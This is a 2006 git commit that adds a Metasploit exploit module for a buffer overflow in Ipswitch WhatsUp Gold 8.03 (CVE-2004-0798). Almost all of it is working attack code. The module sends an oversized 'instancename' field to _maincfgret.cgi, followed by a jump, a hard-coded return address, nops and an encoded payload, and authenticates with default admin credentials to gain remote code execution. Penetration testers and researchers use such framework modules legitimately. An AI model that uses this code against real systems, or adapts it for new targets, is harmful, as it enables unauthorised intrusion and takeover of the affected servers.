added exploit module ipswitch_wug_maincfgret.rb

git-svn-id: file:///home/svn/framework3/trunk@4096 4d416f70-5f16-0410-b530-b9f4589650da
2006-11-01 12:14:17 +00:00 · 2006-11-01 12:14:17 +00:00 · 1823a3df8e
parent 704bb6d43d
commit 1823a3df8e
1 changed files with 80 additions and 0 deletions
--- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb
+++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb
@ -0,0 +1,80 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
+				posting a long string for the value of 'instancename' in the _maincfgret.cgi 
+				script an attacker can overflow a buffer and execute arbitrary code on the system.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 3583 $',
+			'References'     =>
+				[
+					['BID', '11043'],
+                                        ['CVE', '2004-0798'],
+				],
+                        'DefaultOptions' =>
+                                {
+                                        'EXITFUNC' => 'thread',
+                                },
+
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 500,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
+				],
+                        'DefaultTarget' => 0,
+			'DisclosureDate' => 'Aug 25 2004'))
+			
+			register_options( [ 
+						Opt::RPORT(80),
+						OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']),
+						OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']), 
+						], self.class )
+
+	end
+
+	def exploit
+		c = connect
+
+		num  	  = rand(65535).to_s	
+                user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" 
+		
+                req  =  "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
+		req  << "page=notify&origname=&action=return&type=Beeper&instancename="
+		req  << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
+		req  << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
+		req  << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
+		
+		sploit = c.request({
+				'uri'		=> '/_maincfgret.cgi',
+				'method'	=> 'POST',
+				'data'		=> req,
+		})
+	
+		print_status("Trying target %s..." % target.name)
+		
+		res = c.send_request(sploit)
+		
+		handler
+		disconnect
+	end
+
+end
+end